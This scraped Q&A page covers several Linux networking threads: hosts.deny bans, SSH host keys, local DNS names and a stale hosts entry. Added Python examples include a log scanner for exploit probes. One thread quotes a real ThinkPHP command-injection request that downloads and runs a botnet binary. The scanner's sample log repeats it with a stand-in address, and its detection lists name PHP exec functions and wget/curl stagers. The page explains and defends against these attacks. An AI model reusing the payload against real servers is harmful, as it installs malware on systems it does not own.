Why does my IP address keep ending up in hosts.deny file? - linux

At my organisation we've set up a linux server which runs one of our sites. It's been working fine and I have been able to SSH through into it (using Terminal on OSX) no problem.
Earlier, when I tried to ssh root@123.123.123.123 (not my real IP), I was rejected with: ssh_exchange_identification: Connection closed by remote host
Having a look at the /etc/hosts.deny file I can see: sshd: 123.123.123.123 in the list.
This means the IP which I have been using for months no problem has suddenly appeared in the list. I removed it, and was able to SSH in fine, ONCE, then on my second try I was rejected and looking at the list again, I can see we have been added to the list once more!
I have added our IP to the hosts.allow file, but no luck - still no access.
Why do IPs appear in the hosts.deny file?
How can I stop our IP appearing there?

As mentioned, probably fail2ban or similar (look for denyhosts too, another popular one).
The usual fix is to append your IP address to /etc/hosts.allow
This works for denyhosts at least

You may have a system like fail2ban installed which adds you to the hosts.deny file if you enter your password incorrectly a few times.
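To see why the hosts.allow fix works (or does not), it helps to model the order in which libwrap (tcp_wrappers) evaluates the two files. The following is an added example for this thread, not code from any of the answers or from fail2ban/DenyHosts; the two file bodies are constructed, and the code never reads the real /etc/hosts.allow or /etc/hosts.deny.

```python
"""Model of how libwrap (tcp_wrappers) evaluates /etc/hosts.allow and
/etc/hosts.deny for one (daemon, client) pair.
Added example for this thread; the file bodies below are constructed
and the code never reads the real files."""
import ipaddress

# Constructed contents (not from a real host).  The 'sshd: 198.51.100.7'
# line in HOSTS_DENY has the shape that DenyHosts or fail2ban's hostsdeny
# action append after repeated failed logins.
HOSTS_ALLOW = """
# our office address, added by hand
sshd: 198.51.100.7
"""
HOSTS_DENY = """
sshd: 198.51.100.7
ALL: ALL
"""


def parse_rules(text):
    """Return [(daemon_list, client_list), ...]; '#' starts a comment."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        daemons, _, clients = line.partition(":")
        rules.append(([d.strip() for d in daemons.split(",")],
                      [c.strip() for c in clients.split(",")]))
    return rules


def client_matches(pattern, client):
    """Subset of hosts_access(5) client patterns: ALL, an exact address,
    a dotted prefix 'a.b.' and a net/mask 'a.b.c.d/m.m.m.m' (CIDR also
    accepted).  Hostnames, EXCEPT and wildcards are deliberately not
    modelled."""
    if pattern == "ALL":
        return True
    if pattern.endswith("."):
        return client.startswith(pattern)
    if "/" in pattern:
        return ipaddress.ip_address(client) in ipaddress.ip_network(pattern, strict=False)
    return pattern == client


def rule_matches(rule, daemon, client):
    daemons, clients = rule
    return (any(d in ("ALL", daemon) for d in daemons)
            and any(client_matches(c, client) for c in clients))


def access_decision(allow_text, deny_text, daemon, client):
    """libwrap order: hosts.allow first (first match grants), then
    hosts.deny (first match refuses), otherwise access is granted.
    Consequence: a deny line for the same address is irrelevant once an
    allow line matches, so a ban tool that only writes hosts.deny cannot
    override a hand-written allow entry."""
    for rule in parse_rules(allow_text):
        if rule_matches(rule, daemon, client):
            return "allow"
    for rule in parse_rules(deny_text):
        if rule_matches(rule, daemon, client):
            return "deny"
    return "allow"


if __name__ == "__main__":
    for daemon, client in [("sshd", "198.51.100.7"),
                           ("sshd", "203.0.113.9"),
                           ("httpd", "198.51.100.7")]:
        print(daemon, client, access_decision(HOSTS_ALLOW, HOSTS_DENY, daemon, client))
```

Two caveats before relying on this. First, it only describes sshd builds linked against libwrap (check with `ldd "$(command -v sshd)" | grep libwrap`); OpenSSH removed built-in tcp_wrappers support in 6.7, so on a recent unpatched build these files are not consulted at all. Second, fail2ban's default action bans with the packet filter (iptables/nftables), not hosts.deny, and no hosts.allow entry can override a firewall rule; `fail2ban-client status sshd` shows the currently banned addresses, and `fail2ban-client set sshd unbanip 198.51.100.7` lifts one.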

Related

Python 3 http.server - A strange IP address tried to connect my server

Several minutes ago, I ran a python-based server to share a few files with my friend. I disabled the windows firewall so that he could connect and download the files. When someone tries to connect to the server, Python shows their IP address and the path they requested.
Someone whom I don't know tried to get my index.php and run wget. I checked their IP address and it seems like they're from Japan. So, how did this person know my IP address and try to connect to my computer? I've only shared it with my friend on WhatsApp.
I've done this many times before and this is the first time something like this happens.
61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -
There are many people out there running tools like Masscan with custom scripts looking for vulnerable web servers. Most of the time these kinds of scripts are trying to get reverse shells in an attempt to build botnet armies. There are also reports of Windows machines connected to the internet being hacked before the OS finished installing.
This is a pretty common hacking technique. Hackers will scan the internet using seemingly random IP addresses (and happened to pick yours out) and look for open ports (usually common ports like 22, 80 and 443) and run a bunch of common exploits in efforts to gain control over the machine.
Many of the botnets were created by just attacking random IP addresses hoping that they would have a router with the default username and password still set, or out-of-date software with known exploits.
In your case it looks like they were hoping that your web server was running a certain combination of PHP software. Your IP address was probably one of thousands that they ran the same query against.
This is why you shouldn't disable your firewall: the average time it takes from going online without protection to someone trying to crack into your system is at best minutes.
Instead, you should find out the IP of your friend, and just allow that single IP. And unless your friend has a static IP address, remove that allow after they're done testing, because someone else could get that address later.
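The request quoted in the question is recognisable without any signature database: the query string names a PHP execution function and carries a download-and-run command. The following is an added example, not code from the thread; it parses lines in the format Python's http.server prints and flags ones that carry such a payload. The three log lines are constructed in the same shape as the one above, using documentation addresses, not copied from a real host.

```python
"""Flag command-injection probes in the access-log lines that Python's
http.server prints.  Added example; SAMPLE_LOG is constructed."""
import re
from urllib.parse import unquote

# Constructed lines (RFC 5737 addresses), same layout as http.server output.
SAMPLE_LOG = """\
203.0.113.9 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://198.51.100.23/x/payload.bin%20-O%20/tmp/.p;chmod%20777%20/tmp/.p;/tmp/.p HTTP/1.1" 400 -
198.51.100.77 - - [06/Jan/2019 01:30:02] "GET /notes.txt HTTP/1.1" 200 -
203.0.113.9 - - [06/Jan/2019 01:31:40] "GET /index.php?s=/index/\\think\\app/invokefunction&function=phpinfo&vars[0]=1 HTTP/1.1" 404 -
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d+)')

# PHP functions that run OS commands or arbitrary code when handed a string.
DANGEROUS_FUNCS = {"shell_exec", "system", "passthru", "exec", "popen",
                   "proc_open", "assert", "eval"}
# 'wget URL' / 'curl [-flags] URL' inside a decoded parameter value.
DOWNLOAD_RE = re.compile(r'(?:wget|curl)\s+(?:-[A-Za-z]+\s+)*(https?://\S+)')


def classify(line):
    """Return a finding dict for one log line, or None if it is not a
    request line at all."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    query = path.partition("?")[2]
    # Split on '&' by hand so ';' inside a command stays in one value.
    values = [unquote(pair.partition("=")[2]) for pair in query.split("&") if pair]
    indicators = []
    if "invokefunction" in query:
        indicators.append("thinkphp_invokefunction")
    for func in sorted(DANGEROUS_FUNCS):
        if func in values:                      # exact parameter value
            indicators.append("php_exec_function:" + func)
    url = DOWNLOAD_RE.search(" ".join(values))
    payload_url = url.group(1) if url else None
    if payload_url:
        indicators.append("stager_download")
    if payload_url or any(i.startswith("php_exec_function") for i in indicators):
        verdict = "exploit_attempt"
    elif indicators:
        verdict = "probe"
    else:
        verdict = "benign"
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": int(m.group("status")),
            "verdict": verdict, "indicators": indicators, "payload_url": payload_url}


def scan(log_text):
    """All non-benign findings, in log order."""
    findings = (classify(l) for l in log_text.splitlines() if l.strip())
    return [f for f in findings if f and f["verdict"] != "benign"]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["verdict"], f["indicators"], f["payload_url"])
```

The 400 status on the original line means http.server rejected the request before anything was served; the point of extracting the stager URL is that it is the indicator worth blocking or reporting, since the same host is typically used across many targets.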

It is safe to use lvh.me instead of localhost for testing?

I wonder whether it is safe to use lvh.me instead of localhost when developing locally, since lvh.me must be resolved and the IP may change over time.
The goal of using lvh.me is to be able to handle subdomains, since localhost does not have a top-level domain.
Unless you are the maintainer of lvh.me, you cannot be sure it will not disappear or change its RRs for lvh.me.
You can use localhost.localdomain instead of localhost, by adding the following lines in your hosts file:
127.0.0.1 localhost localhost.localdomain
::1 localhost localhost.localdomain
This is better than using lvh.me because:
you may not always have access to a DNS resolver when developing
lvh.me does not answer with a local IPv6 address corresponding to your local host, only with the IPv4 address 127.0.0.1
some ISPs' DNS resolvers block answers corresponding to the private address space, for security purposes (to avoid leaking internal information)
Since you said in a comment that you do not want to update the hosts file, you have no means of being sure that lvh.me will always work for your developers. Therefore, to answer your question: it is not safe. You may register a domain for yourself, but as I said before, some resolvers will block answers corresponding to the private address space.
lvh.me was not resolving to 127.0.0.1 on June 7, 2021. Depending on DNS names you don't control comes with this kind of risk. Although the domain name was reinstated by the end of the day, this answer offers some alternatives to depending on someone else's DNS configurations.
Both Firefox and Google Chrome now treat *.localhost names like localhost. They also do the right thing with port numbers.
To test it yourself, start a local http server listening to port 8000:
python -m http.server 8000
Then try these links
http://example.localhost:8000
http://other.localhost:8000
http://sub.subdomain.localhost:8000
This trick does not help for command line programs. For example, this command will fail to resolve the host:
curl http://example.localhost:8000
Curl itself offers a lot of other tricks that might work for you if you need custom subdomains on the command line. For example, this trick works:
curl --resolve example.localhost:8000:127.0.0.1 \
http://example.localhost:8000
Also worth noting that a similar service is still available.
See https://readme.localtest.me.
One last alternative is to configure your own wildcard CNAME to resolve to 127.0.0.1. For example:
*.my.example.com. 1800 IN CNAME my.example.com.
my.example.com. 1800 IN A 127.0.0.1
No because as of right now http://lvh.me has an expired domain.😬
Services like lvh.me or localtest.me are just DNS services, so the only thing you're publishing to them is the names of the hosts you're using. They could resolve to any IP at any time, but providing you use them only for local tests with fake data, you'll be safe.
But what if they shut down the service? Again, since you should only use them for local tests, you'll get immediate feedback and can easily go back to using localhost.
Quick fix if you don't want to rewrite your code is to open up hosts file
sudo nano /etc/hosts
paste in (replace yoursubdomain with what subdomain you're calling)
127.0.0.1 yoursubdomain.lvh.me
push ctrl-x
then y
then enter
Then you're good to go
It depends on what you're doing. If it's local development then most of the time yes; you can always resolve it if you want to check:
For linux or osx you can run this in terminal:
dig X.nip.io
It should always return 127.0.0.1. So while it's not the "safest" way to do this (because you don't manage the DNS itself), I still use it frequently for some kind of resolving TLD when necessary. Here are some valid, reputable sites that are still around:
https://nip.io/
https://sslip.io/
You can just point your browser at myproject.apps.localhost or www.example.net.localhost.
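The answers above name three ways a public "loopback" domain can let you down: the name stops resolving (expired or filtered by the resolver), it resolves to something that is not loopback, or it only answers for IPv4 while your app listens on ::1. The following added example, not code from the thread, turns those into a check you can run before trusting a name; classify() is pure and is exercised with constructed answer lists, while check() uses the system resolver when you run it yourself.

```python
"""Check that a development hostname resolves the way local testing
needs: every answer is a loopback address, and ::1 is present if the
app is also reached over IPv6.  Added example for the lvh.me thread."""
import ipaddress
import socket


def resolve(name):
    """All addresses the system resolver returns for name.  An empty list
    covers NXDOMAIN as well as a resolver that filters the answer (the
    ISP case mentioned above)."""
    try:
        infos = socket.getaddrinfo(name, None)
    except socket.gaierror:
        return []
    # strip an IPv6 scope id such as %eth0 before parsing
    return sorted({info[4][0].split("%")[0] for info in infos})


def classify(addrs):
    """'ok', 'ipv4_only', 'not_loopback' or 'unresolved'."""
    if not addrs:
        return "unresolved"
    parsed = [ipaddress.ip_address(a) for a in addrs]
    if not all(p.is_loopback for p in parsed):
        return "not_loopback"   # a name you don't control now points elsewhere
    if not any(p.version == 6 for p in parsed):
        return "ipv4_only"      # 127.0.0.1 answered, no ::1
    return "ok"


def check(name, lookup=resolve):
    """Classify what the given lookup function returns for name."""
    return classify(lookup(name))


if __name__ == "__main__":
    for name in ("localhost", "app.localhost", "lvh.me"):
        print(name, check(name))
```

"not_loopback" is the verdict to treat as a hard stop: with the domain expired or repointed, a browser session that sends development cookies or a local API token to whatever the name now resolves to is the realistic failure, not merely a broken test.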

Curl error "no alternative certificate.."

We have a problem in only one of our servers hosted at Amazon (the development server).
The problem happens when doing a curl request to a specific domain, by running this:
> curl https://api.plivo.com
Results in:
curl: (51) SSL: no alternative certificate subject name matches target host name 'api.plivo.com'
I did some research and found out that it might be a problem with the server's certificate, however if I try this from any other server it works fine, same on my local machine.
So I'm thinking that this might be a cache issue from curl? I tried reinstalling it, updating it, but no dice.
I'm almost creating a new dev machine because of this, because it's blocking us from using this service.
To summarize from the comments:
The good and the bad system actually accessed different servers which were configured with different certificates. That's why it failed on one system but not on the other.
The reason for this difference was that the bad system had an entry in /etc/hosts which was used instead of asking the DNS server.
The problem was found by comparing the output of curl -v and realizing that the shown target IP address was different.
The problem was fixed by removing the old entry in /etc/hosts so that it now queries the DNS server and gets the correct IP address of the server.
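The stale /etc/hosts entry was only found by comparing `curl -v` output by hand. The following added example, not code from the thread, automates that comparison: it parses a hosts file body and reports every non-loopback name whose address differs from what DNS answers. The hosts text is constructed; the DNS answer source is passed in as a function so the logic runs offline, and dig_lookup() is an optional hook that assumes `dig` is installed.

```python
"""Find /etc/hosts entries that shadow what DNS would return.
Added example; SAMPLE_HOSTS is constructed."""
import ipaddress
import subprocess

SAMPLE_HOSTS = """\
127.0.0.1   localhost
::1         localhost ip6-localhost
# stale entry left over from a migration
203.0.113.10  api.example.net    # old address
198.51.100.5  db.internal.example
"""


def parse_hosts(text):
    """name -> [addresses] from a hosts(5) body; comments and blanks skipped."""
    mapping = {}
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        for name in fields[1:]:
            mapping.setdefault(name.lower(), []).append(fields[0])
    return mapping


def dig_lookup(name):
    """Ask DNS directly.  getaddrinfo() would consult /etc/hosts first,
    which is exactly what this comparison needs to bypass.  Assumes 'dig'
    is on PATH (an assumption of this example)."""
    addrs = []
    for rrtype in ("A", "AAAA"):
        out = subprocess.run(["dig", "+short", name, rrtype],
                             capture_output=True, text=True, check=False).stdout
        for token in out.split():
            try:
                addrs.append(str(ipaddress.ip_address(token)))
            except ValueError:
                pass  # CNAME targets and error text are not addresses
    return sorted(addrs)


def find_overrides(hosts_text, lookup=dig_lookup):
    """{name: (hosts_addrs, dns_addrs)} for every non-loopback hosts entry
    whose addresses differ from the DNS answer."""
    overrides = {}
    for name, addrs in parse_hosts(hosts_text).items():
        if all(ipaddress.ip_address(a).is_loopback for a in addrs):
            continue
        dns_addrs = lookup(name)
        if sorted(addrs) != sorted(dns_addrs):
            overrides[name] = (sorted(addrs), sorted(dns_addrs))
    return overrides


if __name__ == "__main__":
    # Offline demonstration with a constructed DNS answer table.
    fake_dns = {"api.example.net": ["198.51.100.20"],
                "db.internal.example": ["198.51.100.5"]}
    print(find_overrides(SAMPLE_HOSTS, lookup=lambda n: fake_dns.get(n, [])))
```

To run it against the real file, call `find_overrides(open("/etc/hosts").read())`. Note that `curl -v` itself shows the address actually connected to ("Trying 203.0.113.10:443..."), which is what the summary above used; the script only makes that comparison systematic across every entry, including ones nobody remembers adding.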

Query DNS in Ubuntu

I use two DNS servers a public one (8.8.8.8)
and a local one (192.168.1.20)
In Ubuntu, if I list both DNS servers as 192.168.1.20, 8.8.8.8,
it will always query the first until the first is down, and only then will it start querying the second.
And of course I have to make the local one point to 8.8.8.8 again.
Like this I have almost no problems; I can resolve local addresses and also public ones,
but when I'm out of the office that's where all the problems start.
Having the local DNS first makes Ubuntu check for it every single time it needs to resolve.
So I end up switching the priority of the DNS servers (8.8.8.8, 192.168.1.20) every time I change my location.
This is not the case if I was using windows. It somehow sends to both DNSs at once or something of that sort.
Is there a way to avoid changing the DNS for every location?
Ubuntu also must query each server in /etc/resolv.conf if there is no answer from the first server.
Please give the output of 'dig google.com'.
You wrote 'until the first is down'...
The system of course will only contact the other servers if it gets no response from the first one!
The servers are listed in order of preference.
Not an answer but a possible work around.
Are you able to use different network interfaces for each network?
If so you can specify different "dns-nameservers" in the "/etc/network/interfaces" file.

SSH login warning message on a server with 2 DNS names

I am doing ssh to server x1.example.com from a laptop sometimes from outside and sometimes from lan. From lan I just say
ssh karl@x1
and from wan:
ssh karl@x1.example.com
But from lan I get always a warning: remote host identification has changed.
I can delete the other key in the known_hosts file each time, but I was wondering if there is a better solution.
I am hesitating to turn the key verification off, because this would be less secure. But getting a warning all the time is also insecure (because then I ignore such warnings all the time).
In known_hosts file you can list several names and even IP's for one key, for example:
x1,x1wan.example.com,192.168.0.134,23.41.51.23 ssh-rsa AAAA/bunch/of/gibberish/looking/data/==
But it is not your problem here. If you have a warning that host identification has changed it really means that. It means that between a moment of your first connection to this host from lan and now, somebody regenerated a host key for this host, for example while reinstalling the OS. Or that you have a man-in-the-middle attack.
Confirm with your admin that a host was reinstalled and host key regenerated and then remove old key from your known_hosts file. Next time you connect you'll add a new, correct key to known_hosts file and this warning will go away.
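The answer above makes two separate points: several names can share one known_hosts line, and a changed key for a name you already trust must not be merged away. The following added example, not code from the thread or from OpenSSH, implements both rules over the known_hosts line format; the file body and the key strings are constructed, not real keys.

```python
"""Record a host under a new alias in a known_hosts body while refusing
the case the warning is about: a name already known with a different
key.  Added example; the file body and keys below are constructed."""

KEY_ONE = "AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyOne0000000000000000000000000000"
KEY_TWO = "AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyTwo0000000000000000000000000000"

CONSTRUCTED_KNOWN_HOSTS = f"""\
x1,192.168.0.134 ssh-ed25519 {KEY_ONE}
other.example.com ssh-ed25519 {KEY_TWO}
"""


def parse_known_hosts(text):
    """Entries as ('entry', [hosts], keytype, key).  Comments, @-markers
    (@cert-authority, @revoked) and hashed '|1|' lines are kept verbatim
    because aliases cannot be merged into them."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#@|":
            entries.append(("raw", raw))
            continue
        hosts, keytype, key = line.split()[:3]
        entries.append(("entry", hosts.split(","), keytype, key))
    return entries


def render(entries):
    lines = []
    for e in entries:
        lines.append(e[1] if e[0] == "raw" else f"{','.join(e[1])} {e[2]} {e[3]}")
    return "\n".join(lines) + "\n"


def record_host(text, name, keytype, key):
    """Return (new_text, action); action is 'present', 'alias_added',
    'new_line' or 'MISMATCH' (text returned unchanged)."""
    entries = parse_known_hosts(text)
    # Rule 1: the same name with a different key of the same type is the
    # 'remote host identification has changed' case.  Never merge it.
    for e in entries:
        if e[0] == "entry" and name in e[1] and e[2] == keytype and e[3] != key:
            return text, "MISMATCH"
    # Rule 2: a key we already trust under another name gets the alias.
    for i, e in enumerate(entries):
        if e[0] == "entry" and (e[2], e[3]) == (keytype, key):
            if name in e[1]:
                return text, "present"
            entries[i] = ("entry", e[1] + [name], keytype, key)
            return render(entries), "alias_added"
    entries.append(("entry", [name], keytype, key))
    return render(entries), "new_line"


if __name__ == "__main__":
    new_text, action = record_host(CONSTRUCTED_KNOWN_HOSTS, "x1wan.example.com",
                                   "ssh-ed25519", KEY_ONE)
    print(action)
    print(new_text)
```

The key to pass in comes from `ssh-keyscan -t ed25519 x1`, whose output has the same "name keytype key" shape; compare its fingerprint (`ssh-keyscan -t ed25519 x1 | ssh-keygen -lf -`) with one obtained out of band before recording it. With `HashKnownHosts yes` in ssh_config the file holds only `|1|` lines, which this code leaves alone; in that setup the cleaner fix is `HostKeyAlias x1` in a `Host x1 x1.example.com` block, so both names are checked against one entry.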
I think it is actually one name, technically.
Assign a second host name (maybe via your hosts file) to access your server from the WAN: E.g.:
ssh karl@x1wan.example.com
I access a server via ssh with two different names (same IP) with no warnings. E.g.: name1.example.com and name2.example.com
Thank you very much for your answers.
Sorry folks, I lost my cookie based login and cannot rate or edit anymore. Your questions helped me to get around the problem when I change from LAN to WAN. I regard this question as solved.
But now I see the problem goes even deeper because I also have 2 hosts on the same IP, and the IP also changes, which I am covering (from my new account which I cannot lose anymore) in a new question with more details:
How to handle ssh host key verification with 2 different hosts on the same (but changing) IP address?
